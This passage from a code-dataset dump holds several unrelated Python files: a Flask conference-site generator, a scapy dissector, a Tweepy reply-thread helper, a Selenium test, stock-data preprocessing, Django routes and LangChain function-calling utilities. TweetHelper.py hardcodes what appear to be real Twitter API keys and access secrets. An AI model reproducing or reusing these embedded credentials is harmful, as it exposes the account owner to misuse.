v[\"sessions\"][0][\"time_start\"],\n \"endTime\": v[\"sessions\"][-1][\"time_end\"],\n \"sessions\": [format_by_session_list(by_uid[\"sessions\"][timeslot[\"session_id\"]]) for timeslot in v[\"sessions\"]],\n }\n\n\n# new format for session_list.json\ndef format_session_list(v):\n return {\n \"id\": v[\"session_id\"],\n \"title\": v[\"title\"],\n \"type\": v[\"session_id\"][0], # first character designates type\n \"startTime\": v[\"time_start\"],\n \"endTime\": v[\"time_end\"],\n \"timeSlots\": v[\"time_slots\"],\n }\n\n\ndef format_by_session_list(v):\n fullTitle = v[\"event\"]\n redundantTitle = True\n if v[\"event\"].lower() != v[\"title\"].lower():\n fullTitle += \": \" + v[\"title\"]\n redundantTitle = False\n\n return {\n \"id\": v[\"session_id\"],\n \"title\": v[\"title\"],\n \"type\": v[\"event_type\"]\n .split(\" \")[0]\n .lower(), # get first word, which should be good enough...\n \"chair\": v[\"chair\"],\n \"organizers\": v[\"organizers\"],\n \"calendarDisplayStartTime\": v[\"display_start\"],\n \"startTime\": v[\"time_start\"],\n \"endTime\": v[\"time_end\"],\n \"timeSlots\": v[\"time_slots\"],\n \"event\": v[\"event\"], # backloaded from parent event\n \"event_type\": v[\"event_type\"], # backloaded from parent event\n \"parent_id\": v[\"parent_id\"], # backloaded from parent event\n \"event_description\": v[\"event_description\"], # backloaded from parent event\n \"event_url\": v[\"event_url\"], # backloaded from parent event\n \"fullTitle\": fullTitle,\n \"redundantTitle\": redundantTitle,\n \"discord_category\": v[\"discord_category\"],\n \"discord_channel\": v[\"discord_channel\"],\n \"discord_channel_id\": v[\"discord_channel_id\"],\n \"youtube_url\": v[\"youtube_url\"],\n \"youtube_id\": 
v[\"youtube_url\"].split(\"/\")[-1] if v[\"youtube_url\"] else None,\n \"ff_playlist\": v[\"ff_playlist\"],\n \"ff_playlist_id\": v[\"ff_playlist\"].split(\"=\")[-1] if v[\"ff_playlist\"] else None,\n # \"zoom_meeting\": v[\"zoom_meeting\"]\n }\n\n\n# ITEM PAGES\n\n\n@app.route(\"/paper_.html\")\ndef paper(paper):\n uid = paper\n v = by_uid[\"paper_list\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"paper\"] = format_paper(v)\n return render_template(\"paper.html\", **data)\n\n\n# ALPER TODO: get keynote info\n@app.route(\"/speaker_.html\")\ndef speaker(speaker):\n uid = speaker\n v = by_uid[\"speakers\"][uid]\n data = _data()\n data[\"speaker\"] = v\n return render_template(\"speaker.html\", **data)\n\n@app.route(\"/awards.html\")\ndef awards():\n data = _data()\n data[\"awards_honor\"] = site_data[\"awards_honor\"]\n data[\"awards_tot\"] = site_data[\"awards_tot\"]\n data[\"awards_academy\"] = site_data[\"awards_academy\"]\n data[\"awards_papers\"] = site_data[\"awards_papers\"]\n return render_template(\"awards.html\", **data)\n\n\n@app.route(\"/speakers.html\")\ndef speakers():\n data = _data()\n data[\"speakers\"] = site_data[\"speakers\"]\n return render_template(\"speakers.html\", **data)\n\n# ALPER TODO: populate the workshop list from session_list\n@app.route(\"/workshop_.html\")\ndef workshop(workshop):\n uid = workshop\n v = by_uid[\"workshops\"][uid]\n data = _data()\n data[\"workshop\"] = format_workshop(v)\n return render_template(\"workshop.html\", **data)\n\n\n@app.route('/session_vis-keynote.html')\ndef keynote():\n uid = \"vis-keynote\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"session\"][\"speaker\"] = site_data[\"speakers\"][0]\n return render_template(\"keynote_or_capstone.html\", **data)\n\n\n@app.route('/session_vis-capstone.html')\ndef capstone():\n uid = \"vis-capstone\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"session\"][\"speaker\"] = site_data[\"speakers\"][1]\n return render_template(\"keynote_or_capstone.html\", **data)\n\n@app.route(\"/session_x-posters.html\")\ndef poster_session():\n uid = \"x-posters\"\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n data[\"event\"] = format_session_as_event(by_uid['events'][uid], uid)\n if uid in site_data[\"event_ff_playlists\"]:\n data[\"event\"][\"ff_playlist\"] = site_data[\"event_ff_playlists\"][uid]\n data[\"event\"][\"ff_playlist_id\"] = site_data[\"event_ff_playlists\"][uid].split(\"=\")[-1]\n return render_template(\"poster_session.html\", **data)\n\n\n@app.route(\"/session_.html\")\ndef session(session):\n uid = session\n v = by_uid[\"sessions\"][uid]\n data = _data()\n data[\"requires_auth\"] = True\n data[\"session\"] = format_by_session_list(v)\n return render_template(\"session.html\", **data)\n\n\n@app.route('/event_.html')\ndef event(event):\n uid = event\n v = by_uid['events'][uid]\n data = _data()\n data[\"event\"] = format_session_as_event(v, uid)\n if uid in site_data[\"event_ff_playlists\"]:\n data[\"event\"][\"ff_playlist\"] = site_data[\"event_ff_playlists\"][uid]\n data[\"event\"][\"ff_playlist_id\"] = site_data[\"event_ff_playlists\"][uid].split(\"=\")[-1]\n return render_template(\"event.html\", **data)\n\n\n# ALPER TODO: there should be a single poster page; redirect to 
iPosters\n@app.route(\"/posters.html\")\ndef posters():\n    data = _data()\n    data[\"requires_auth\"] = True\n    return render_template(\"posters.html\", **data)\n\n## Internal only; used to generate markdown-like list for main website paper list\n@app.route(\"/paperlist.html\")\ndef allpapers():\n    data = _data()\n    data[\"papers\"] = {\n        'full': [],\n        'short': [],\n    }\n    for uid, v in site_data[\"paper_list\"].items():\n        if uid[0] == \"f\":\n            data['papers']['full'].append(format_paper_list(v))\n        if uid[0] == \"s\":\n            data['papers']['short'].append(format_paper_list(v))\n\n    return render_template(\"paperlist.html\", **data)\n\n\n# ALPER TODO: remove\n@app.route(\"/chat.html\")\ndef chat():\n    data = _data()\n    return render_template(\"chat.html\", **data)\n\n\n@app.route(\"/redirect.html\")\ndef redirect_page():\n    data = _data()\n    data[\"requires_auth\"] = True\n    return render_template(\"redirect.html\", **data)\n\n\n# FRONT END SERVING\n\n@app.route(\"/papers.json\")\ndef paper_json():\n    json = []\n    for v in site_data[\"paper_list\"].items():\n        json.append(format_paper(v[1]))\n    return jsonify(json)\n\n\n@app.route(\"/static/<path:path>\")\ndef send_static(path):\n    return send_from_directory(\"static\", path)\n\n\n@app.route(\"/serve_<path>.json\")\ndef serve(path):\n    return jsonify(site_data[path])\n\n\n# --------------- DRIVER CODE -------------------------->\n# Code to turn it all static\n\n\n@freezer.register_generator\ndef generator():\n    for paper in site_data[\"paper_list\"].values():\n        yield \"paper\", {\"paper\": str(paper[\"uid\"])}\n    for speaker in site_data[\"speakers\"]:\n        yield \"speaker\", {\"speaker\": str(speaker[\"UID\"])}\n    for workshop in site_data[\"workshops\"]:\n        yield \"workshop\", {\"workshop\": str(workshop[\"UID\"])}\n    for session in by_uid[\"sessions\"].keys():\n        yield \"session\", {\"session\": str(session)}\n    for event in by_uid[\"events\"].keys():\n        yield \"event\", {\"event\": str(event)}\n\n    for key in site_data:\n        yield \"serve\", {\"path\": key}\n\n\ndef parse_arguments():\n    parser = argparse.ArgumentParser(description=\"MiniConf Portal Command Line\")\n\n    parser.add_argument(\n        \"--build\",\n        action=\"store_true\",\n        default=False,\n        help=\"Convert the site to static assets\",\n    )\n\n    parser.add_argument(\n        \"-b\",\n        action=\"store_true\",\n        default=False,\n        dest=\"build\",\n        help=\"Convert the site to static assets\",\n    )\n\n    parser.add_argument(\"path\", help=\"Pass the JSON data path and run the server\")\n\n    args = parser.parse_args()\n    return args\n\n\nif __name__ == \"__main__\":\n    args = parse_arguments()\n\n    site_data_path = args.path\n    extra_files = main(site_data_path)\n\n    generateDayCalendars()\n\n    if args.build:\n        minify(app=app, html=True, js=False, cssless=True)\n        freezer.freeze()\n    else:\n        debug_val = False\n        if os.getenv(\"FLASK_DEBUG\") == \"True\":\n            debug_val = True\n\n        app.run(port=5000, debug=debug_val, extra_files=extra_files)\n
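# NOTE (added sketch, not from the original app; the sitedata/ path is hypothetical):\n#   python main.py sitedata/           # load the site JSON and serve on port 5000\n#   python main.py sitedata/ --build   # minify, then freeze the site to static assets\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"185001413","text":"from scapy.all import *\n\n##class definitions\nclass Ethernet(Packet):\n\tname = 'ethernet'\n\tfields_desc = [\n\t\tXBitField('dstAddr', 0, 48),\n\t\tXBitField('srcAddr', 0, 48),\n\t\tXShortField('etherType', 0),\n\t]\nclass Ipv4(Packet):\n\tname = 'ipv4'\n\tfields_desc = [\n\t\tXBitField('version', 0, 4),\n\t\tXBitField('ihl', 0, 4),\n\t\tXByteField('diffserv', 0),\n\t\tXShortField('totalLen', 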
0),\n\t\tXShortField('identification', 0),\n\t\tXBitField('flags', 0, 3),\n\t\tXBitField('fragOffset', 0, 13),\n\t\tXByteField('ttl', 0),\n\t\tXByteField('protocol', 0),\n\t\tXShortField('hdrChecksum', 0),\n\t\tXLongField('srcAddr', 0),\n\t\tXLongField('dstAddr', 0),\n\t]\n\t#update hdrChecksum over [[u'ipv4', u'version'], [u'ipv4', u'ihl'], [u'ipv4', u'diffserv'], [u'ipv4', u'totalLen'], [u'ipv4', u'identification'], [u'ipv4', u'flags'], [u'ipv4', u'fragOffset'], [u'ipv4', u'ttl'], [u'ipv4', u'protocol'], [u'ipv4', u'srcAddr'], [u'ipv4', u'dstAddr']] using csum16 in post_build method\n\nclass Q_meta(Packet):\n\tname = 'q_meta'\n\tfields_desc = [\n\t\tXShortField('flow_id', 0),\n\t\tXShortField('_pad0', 0),\n\t\tXBitField('ingress_global_tstamp', 0, 48),\n\t\tXShortField('_pad1', 0),\n\t\tXBitField('egress_global_tstamp', 0, 48),\n\t\tXBitField('_spare_pad_bits', 0, 15),\n\t\tXBitField('markbit', 0, 1),\n\t\tXBitField('_pad2', 0, 13),\n\t\tXBitField('enq_qdepth', 0, 19),\n\t\tXBitField('_pad3', 0, 13),\n\t\tXBitField('deq_qdepth', 0, 19),\n\t]\nclass Snapshot(Packet):\n\tname = 'snapshot'\n\tfields_desc = [\n\t\tXShortField('ingress_global_tstamp_hi_16', 0),\n\t\tXLongField('ingress_global_tstamp_lo_32', 0),\n\t\tXLongField('egress_global_tstamp_lo_32', 0),\n\t\tXLongField('enq_qdepth', 0),\n\t\tXLongField('deq_qdepth', 0),\n\t\tXShortField('_pad0', 0),\n\t\tXBitField('orig_egress_global_tstamp', 0, 48),\n\t\tXShortField('_pad1', 0),\n\t\tXBitField('new_egress_global_tstamp', 0, 48),\n\t\tXLongField('new_enq_tstamp', 0),\n\t]\nclass Udp(Packet):\n\tname = 'udp'\n\tfields_desc = [\n\t\tXShortField('srcPort', 0),\n\t\tXShortField('dstPort', 0),\n\t\tXShortField('hdr_length', 0),\n\t\tXShortField('checksum', 0),\n\t]\n\n##bindings\nbind_layers(Ethernet, Ipv4, etherType = 0x0800)\nbind_layers(Ipv4, Udp, protocol = 0x11)\nbind_layers(Udp, Q_meta, dstPort = 0x1e61)\nbind_layers(Udp, Snapshot, dstPort = 0x22b8)\n\n##packet_list\npossible_packets_ = [\n\t(Ethernet()),\n\t(Ethernet()/Ipv4()),\n\t(Ethernet()/Ipv4()/Udp()),\n\t(Ethernet()/Ipv4()/Udp()/Q_meta()),\n\t(Ethernet()/Ipv4()/Udp()/Snapshot())\n]\n","sub_path":"samples/dummy/output/scapy/dissector_dummy.py","file_name":"dissector_dummy.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"541300666","text":"from pathlib import Path\nfrom tweepy import *\nfrom Node import Node\nimport json\nimport tweepy\nimport sys\nimport time\n\n\nclass TweetHelper:\n\n def __init__(self):\n # Tweepy Variables\n consumer_key = 'fwbtkGf8N97yyUZyH5YzLw'\n consumer_secret = 'oQA5DunUy89Co5Hr7p4O2WmdzqiGTzssn2kMphKc8g'\n access_token = '461053984-aww1IbpSVcxUE2jN8VqsOkEw8IQeEMusx4IdPM9p'\n access_secret = 'WGsbat8P8flqKqyAymnWnTnAGI5hZkgdaQSE8XALs7ZEp'\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n self.api = tweepy.API(auth)\n\n def list_reply_ancestors(self, tweet):\n\n ancestor_id = tweet.in_reply_to_status_id\n ancestor_tweet = self.retrieve_tweet(ancestor_id)\n\n if ancestor_tweet is None:\n return [tweet]\n else:\n return self.list_reply_ancestors(ancestor_tweet) + [tweet]\n\n\n def find_root_ancestor(self, tweet):\n ancestor_id = tweet.in_reply_to_status_id\n ancestor_tweet = self.retrieve_tweet(ancestor_id)\n\n if ancestor_tweet is None:\n return tweet\n else:\n return self.find_root_ancestor(ancestor_tweet)\n\n\n def retrieve_tweet(self, tweet_id):\n tweet = None\n try:\n if tweet_id is not None:\n 
tweet = self.api.get_status(tweet_id)\n except tweepy.RateLimitError:\n print(\"Hit the rate limit. Sleeping for 5 minutes.\")\n time.sleep(60*5)\n tweet = self.retrieve_tweet(tweet_id)\n except TweepError as err:\n print(\"Tweep Error: {}\".format(err))\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n\n return tweet\n\n\n def construct_reply_tree(self, tweet):\n\n # Search for replies to the given tweet\n raw_search_results = self.api.search(\"q='to:{}'\".format(tweet.user.screen_name), sinceId = tweet.id)\n filtered_search_results = [result for result in raw_search_results if result.in_reply_to_user_id == tweet.user.id]\n\n print(\"q='to:{}'\".format(tweet.user.screen_name))\n print(\"Found {} results, with final {}\".format(len(raw_search_results), len(filtered_search_results)))\n\n # Construct the tree for this tweet\n new_reply_node = Node(tweet)\n\n # Base case is when there are no found replies to the given tweet\n for reply_tweet in filtered_search_results:\n new_reply_node.add_child(self.construct_reply_tree(reply_tweet))\n\n return new_reply_node\n\n def construct_reply_thread(self, tweet):\n reply_thread_root = self.find_root_ancestor(tweet)\n reply_thread_tree = self.construct_reply_tree(reply_thread_root)\n return reply_thread_tree\n\n","sub_path":"TweetHelper.py","file_name":"TweetHelper.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"453373803","text":"import csv\r\nimport unittest\r\nfrom base.ranzhi_driver import RanzhiDriver\r\nfrom pages.ranzhi_create_doc_page import RanzhiCreateDocPage\r\nfrom pages.ranzhi_login_page import RanzhiLoginPage\r\n\r\n\r\nclass RanzhiTestCreatedoc(unittest.TestCase):\r\n\r\n URL = 'http://localhost/ranzhi/www'\r\n def setUp(self):\r\n self.driver = RanzhiDriver('Firefox')\r\n self.driver.maximize_window()\r\n self.driver.implicitly_wait(2)\r\n self.driver.navigate(self.URL)\r\n ranzhilogin = RanzhiLoginPage(self.driver)\r\n ranzhilogin.login('admin', '123456')\r\n self.driver.sleep(1)\r\n\r\n\r\n def tearDown(self):\r\n pass\r\n # self.driver.quit_browser()\r\n\r\n def ranzhitestcreatedoc(self):\r\n csv_file = open(r'D:\\PycharmProjects\\Ranzhi_Test\\data\\createdoc.csv',\r\n mode='r',\r\n encoding='utf8')\r\n csv_data = csv.reader(csv_file)\r\n is_header = True\r\n for line in csv_data:\r\n if is_header:\r\n is_header = False\r\n continue\r\n data = {'doclibrary':line[0],\r\n 'category':line[1],\r\n 'authorise_users':line[2],\r\n 'authorise_group':line[3],\r\n 'doctype':line[4],\r\n 'inpuheadline':line[5],\r\n 'inputtext':line[6],\r\n 'keyword':line[7],\r\n 'abstracts':line[8],\r\n 'attachments_path':line[9]}\r\n createdoc = RanzhiCreateDocPage(self.driver)\r\n createdoc.ranzhicreatedocpage(data)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","sub_path":"Ranzhi_Test/cases/ranzhi_test_createdoc.py","file_name":"ranzhi_test_createdoc.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"259294154","text":"import matplotlib.pyplot as plt\ndef figFontSizes(small=14, medium=16, large=20):\n\n plt.rc('font', size=small) # controls default text sizes\n plt.rc('axes', titlesize=large) # fontsize of the axes title\n plt.rc('axes', labelsize=medium) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=small) # fontsize of the tick labels\n plt.rc('ytick', labelsize=small) # fontsize of the tick labels\n plt.rc('legend', 
fontsize=small) # legend fontsize\n plt.rc('figure', titlesize=large) # fontsize of the figure title\n\n\nfigFontSizes()","sub_path":"plotFontSize.py","file_name":"plotFontSize.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335269449","text":"from django.urls import path\nfrom . import views\n\napp_name = \"board\"\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('detail/', views.detail, name=\"detail\"),\n path('delete/', views.delete, name=\"delete\"),\n path('create', views.create, name=\"create\"),\n path('create_reply/', views.create_reply, name=\"create_reply\"),\n path('remove_reply//', views.remove_reply, name=\"remove_reply\"),\n path('addup/', views.addup, name=\"addup\"),\n path('removeup/', views.removeup, name=\"removeup\")\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"287801279","text":"import math, random\r\nimport gym\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.autograd as autograd\r\nimport torch.nn.functional as F\r\nfrom torch.distributions import Categorical\r\nimport pandas as pd\r\nimport pickle\r\nimport csv\r\nimport random\r\n\r\nwith open(\"D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\data\\stock.data\", \"rb\") as f:\r\n data = pickle.load(f)\r\n\r\nkeys = data.keys()\r\nstocks = []\r\nID = []\r\nfor i in keys:\r\n stock = data[i]\r\n stock = stock.loc[stock.trade_date>'2015000']\r\n if stock.shape[0] > 1200:\r\n stocks.append(stock)\r\n ID.append(i)\r\n#print(len(stocks)) #1225\r\n\r\nstocks = stocks[:]\r\nID = ID[:]\r\nnum_stock = len(stocks)\r\n\r\ndef dateformat(s):\r\n assert len(s) == 8\r\n return s[:4]+'-'+s[4:6]+'-'+s[6:8]\r\ndf = [pd.DataFrame() for _ in range(num_stock)]\r\nfor i in range(num_stock):\r\n df[i] = stocks[i].loc[:,['trade_date','close','vol']]\r\n df[i].loc[:,'vol'] = df[i].vol.apply(math.ceil)\r\n df[i].rename(columns = {'trade_date':'timestamp', 'vol':'volume'},inplace = True)\r\n df[i].loc[:,'timestamp'] = df[i].timestamp.apply(dateformat)\r\n \r\n\r\nfor i in range(num_stock):\r\n df[i].rename(columns = {'timestamp':'Date', 'close':'Close', 'volume':'Volume'}, inplace = True)\r\n\r\nfor i in range(num_stock):\r\n df[i].to_csv('D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\milestone3\\LSTM-Neural-Network-for-Time-Series-Prediction\\data\\{}.csv'.format(ID[i]),index=False)\r\n\r\n\r\nwith open('D:\\ColumbiaCourses\\Advanced Big Data Analytics 6895\\milestone3\\LSTM-Neural-Network-for-Time-Series-Prediction\\data\\ID.csv', 'w') as out_f:\r\n for l in ID:\r\n out_f.write(l)\r\n out_f.write('\\n')","sub_path":"src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"142326628","text":"\"\"\"Methods for creating chains that use OpenAI function-calling APIs.\"\"\"\nimport inspect\nimport re\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Type, Union\n\nfrom pydantic import BaseModel\n\nfrom langchain.base_language import BaseLanguageModel\nfrom langchain.chains import LLMChain\nfrom langchain.output_parsers.openai_functions import (\n JsonOutputFunctionsParser,\n PydanticAttrOutputFunctionsParser,\n 
PydanticOutputFunctionsParser,\n)\nfrom langchain.prompts import BasePromptTemplate\nfrom langchain.schema import BaseLLMOutputParser\n\nPYTHON_TO_JSON_TYPES = {\n    \"str\": \"string\",\n    \"int\": \"number\",\n    \"float\": \"number\",\n    \"bool\": \"boolean\",\n}\n\n\ndef _get_python_function_name(function: Callable) -> str:\n    \"\"\"Get the name of a Python function.\"\"\"\n    source = inspect.getsource(function)\n    return re.search(r\"^def (.*)\\(\", source).groups()[0]  # type: ignore\n\n\ndef _parse_python_function_docstring(function: Callable) -> Tuple[str, dict]:\n    \"\"\"Parse the function and argument descriptions from the docstring of a function.\n\n    Assumes the function docstring follows Google Python style guide.\n    \"\"\"\n    docstring = inspect.getdoc(function)\n    if docstring:\n        docstring_blocks = docstring.split(\"\\n\\n\")\n        descriptors = []\n        args_block = None\n        past_descriptors = False\n        for block in docstring_blocks:\n            if block.startswith(\"Args:\"):\n                args_block = block\n                break\n            elif block.startswith(\"Returns:\") or block.startswith(\"Example:\"):\n                # Don't break in case Args come after\n                past_descriptors = True\n            elif not past_descriptors:\n                descriptors.append(block)\n            else:\n                continue\n        description = \" \".join(descriptors)\n    else:\n        description = \"\"\n        args_block = None\n    arg_descriptions = {}\n    if args_block:\n        arg = None\n        for line in args_block.split(\"\\n\")[1:]:\n            if \":\" in line:\n                # split only on the first colon so descriptions may contain colons\n                arg, desc = line.split(\":\", 1)\n                arg_descriptions[arg.strip()] = desc.strip()\n            elif arg:\n                arg_descriptions[arg.strip()] += \" \" + line.strip()\n    return description, arg_descriptions\n\n\ndef _get_python_function_arguments(function: Callable, arg_descriptions: dict) -> dict:\n    \"\"\"Get JsonSchema describing a Python functions arguments.\n\n    Assumes all function arguments are of primitive types (int, float, str, bool) or\n    are subclasses of pydantic.BaseModel.\n    \"\"\"\n    properties = {}\n    annotations = inspect.getfullargspec(function).annotations\n    for arg, arg_type in annotations.items():\n        if arg == \"return\":\n            continue\n        if isinstance(arg_type, type) and issubclass(arg_type, BaseModel):\n            properties[arg] = arg_type.schema()\n        elif arg_type.__name__ in PYTHON_TO_JSON_TYPES:\n            properties[arg] = {\"type\": PYTHON_TO_JSON_TYPES[arg_type.__name__]}\n        if arg in arg_descriptions:\n            if arg not in properties:\n                properties[arg] = {}\n            properties[arg][\"description\"] = arg_descriptions[arg]\n    return properties\n\n\ndef _get_python_function_required_args(function: Callable) -> List[str]:\n    \"\"\"Get the required arguments for a Python function.\"\"\"\n    spec = inspect.getfullargspec(function)\n    required = spec.args[: -len(spec.defaults)] if spec.defaults else spec.args\n    required += [k for k in spec.kwonlyargs if k not in (spec.kwonlydefaults or {})]\n    return required
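\n\n# NOTE (added sketch, not part of the library): for\n#     def multiply(a: int, b: int = 1) -> int: ...\n# with a Google-style docstring ('Multiply two numbers.' plus an Args: section),\n# the helpers above yield name 'multiply', description 'Multiply two numbers.',\n# JSON-schema properties mapping a and b to type 'number', and required == ['a']\n# (b is optional because it has a default).\n\n\ndef convert_python_function_to_openai_function(function: Callable) -> Dict[str, Any]:\n    \"\"\"Convert a Python function to an OpenAI function-calling API compatible dict.\n\n    Assumes the Python function has type hints and a docstring with a description. 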
If\n the docstring has Google Python style argument descriptions, these will be\n included as well.\n \"\"\"\n description, arg_descriptions = _parse_python_function_docstring(function)\n return {\n \"name\": _get_python_function_name(function),\n \"description\": description,\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": _get_python_function_arguments(function, arg_descriptions),\n \"required\": _get_python_function_required_args(function),\n },\n }\n\n\ndef convert_to_openai_function(\n function: Union[Dict[str, Any], Type[BaseModel], Callable]\n) -> Dict[str, Any]:\n \"\"\"Convert a raw function/class to an OpenAI function.\n\n Args:\n function: Either a dictionary, a pydantic.BaseModel class, or a Python function.\n If a dictionary is passed in, it is assumed to already be a valid OpenAI\n function.\n\n Returns:\n A dict version of the passed in function which is compatible with the\n OpenAI function-calling API.\n \"\"\"\n if isinstance(function, dict):\n return function\n elif isinstance(function, type) and issubclass(function, BaseModel):\n schema = function.schema()\n return {\n \"name\": schema[\"title\"],\n \"description\": schema[\"description\"],\n \"parameters\": schema,\n }\n elif callable(function):\n return convert_python_function_to_openai_function(function)\n\n else:\n raise ValueError(\n f\"Unsupported function type {type(function)}. Functions must be passed in\"\n f\" as Dict, pydantic.BaseModel, or Callable.\"\n )\n\n\ndef _get_openai_output_parser(\n functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],\n function_names: Sequence[str],\n) -> BaseLLMOutputParser:\n \"\"\"Get the appropriate function output parser given the user functions.\"\"\"\n if isinstance(functions[0], type) and issubclass(functions[0], BaseModel):\n if len(functions) > 1:\n pydantic_schema: Union[Dict, Type[BaseModel]] = {\n name: fn for name, fn in zip(function_names, functions)\n }\n else:\n pydantic_schema = functions[0]\n output_parser: BaseLLMOutputParser = PydanticOutputFunctionsParser(\n pydantic_schema=pydantic_schema\n )\n else:\n output_parser = JsonOutputFunctionsParser(args_only=len(functions) <= 1)\n return output_parser\n\n\ndef create_openai_fn_chain(\n functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]],\n llm: BaseLanguageModel,\n prompt: BasePromptTemplate,\n *,\n output_parser: Optional[BaseLLMOutputParser] = None,\n **kwargs: Any,\n) -> LLMChain:\n \"\"\"Create an LLM chain that uses OpenAI functions.\n\n Args:\n functions: A sequence of either dictionaries, pydantic.BaseModels classes, or\n Python functions. If dictionaries are passed in, they are assumed to\n already be a valid OpenAI functions. If only a single\n function is passed in, then it will be enforced that the model use that\n function. pydantic.BaseModels and Python functions should have docstrings\n describing what the function does. For best results, pydantic.BaseModels\n should have descriptions of the parameters and Python functions should have\n Google Python style args descriptions in the docstring. Additionally,\n Python functions should only use primitive types (str, int, float, bool) or\n pydantic.BaseModels for arguments.\n llm: Language model to use, assumed to support the OpenAI function-calling API.\n prompt: BasePromptTemplate to pass to the model.\n output_parser: BaseLLMOutputParser to use for parsing model outputs. By default\n will be inferred from the function types. 
If pydantic.BaseModels are passed\n in, then the OutputParser will try to parse outputs using those. Otherwise\n model outputs will simply be parsed as JSON. If multiple functions are\n passed in and they are not pydantic.BaseModels, the chain output will\n include both the name of the function that was returned and the arguments\n to pass to the function.\n\n Returns:\n An LLMChain that will pass in the given functions to the model when run.\n\n Example:\n .. code-block:: python\n\n from langchain.chains.openai_functions import create_openai_fn_chain\n from langchain.chat_models import ChatOpenAI\n from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate\n\n from pydantic import BaseModel, Field\n\n\n class RecordPerson(BaseModel):\n \\\"\\\"\\\"Record some identifying information about a person.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The person's name\")\n age: int = Field(..., description=\"The person's age\")\n fav_food: Optional[str] = Field(None, description=\"The person's favorite food\")\n\n\n class RecordDog(BaseModel):\n \\\"\\\"\\\"Record some identifying information about a dog.\\\"\\\"\\\"\n\n name: str = Field(..., description=\"The dog's name\")\n color: str = Field(..., description=\"The dog's color\")\n fav_food: Optional[str] = Field(None, description=\"The dog's favorite food\")\n\n\n llm = ChatOpenAI(model=\"gpt-3.5-turbo-0613\", temperature=0)\n prompt_msgs = [\n SystemMessage(\n content=\"You are a world class algorithm for recording entities\"\n ),\n HumanMessage(content=\"Make calls to the relevant function to record the entities in the following input:\"),\n HumanMessagePromptTemplate.from_template(\"{input}\"),\n HumanMessage(content=\"Tips: Make sure to answer in the correct format\"),\n ]\n prompt = ChatPromptTemplate(messages=prompt_msgs)\n chain = create_openai_fn_chain([RecordPerson, RecordDog])\n chain.run(\"Harry was a chubby brown beagle who loved chicken\")\n # -> RecordDog(name=\"Harry\", color=\"brown\", fav_food=\"chicken\")\n \"\"\" # noqa: E501\n if not functions:\n raise ValueError(\"Need to pass in at least one function. Received zero.\")\n openai_functions = [convert_to_openai_function(f) for f in functions]\n fn_names = [oai_fn[\"name\"] for oai_fn in openai_functions]\n output_parser = output_parser or _get_openai_output_parser(functions, fn_names)\n llm_kwargs: Dict[str, Any] = {\n \"functions\": openai_functions,\n }\n if len(openai_functions) == 1:\n llm_kwargs[\"function_call\"] = {\"name\": openai_functions[0][\"name\"]}\n llm_chain = LLMChain(\n llm=llm,\n prompt=prompt,\n output_parser=output_parser,\n llm_kwargs=llm_kwargs,\n output_key=\"function\",\n **kwargs,\n )\n return llm_chain\n\n\ndef create_structured_output_chain(\n output_schema: Union[Dict[str, Any], Type[BaseModel]],\n llm: BaseLanguageModel,\n prompt: BasePromptTemplate,\n *,\n output_parser: Optional[BaseLLMOutputParser] = None,\n **kwargs: Any,\n) -> LLMChain:\n \"\"\"Create an LLMChain that uses an OpenAI function to get a structured output.\n\n Args:\n output_schema: Either a dictionary or pydantic.BaseModel class. If a dictionary\n is passed in, it's assumed to already be a valid JsonSchema.\n For best results, pydantic.BaseModels should have docstrings describing what\n the schema represents and descriptions for the parameters.\n llm: Language model to use, assumed to support the OpenAI function-calling API.\n prompt: BasePromptTemplate to pass to the model.\n output_parser: BaseLLMOutputParser to use for parsing model outputs. 
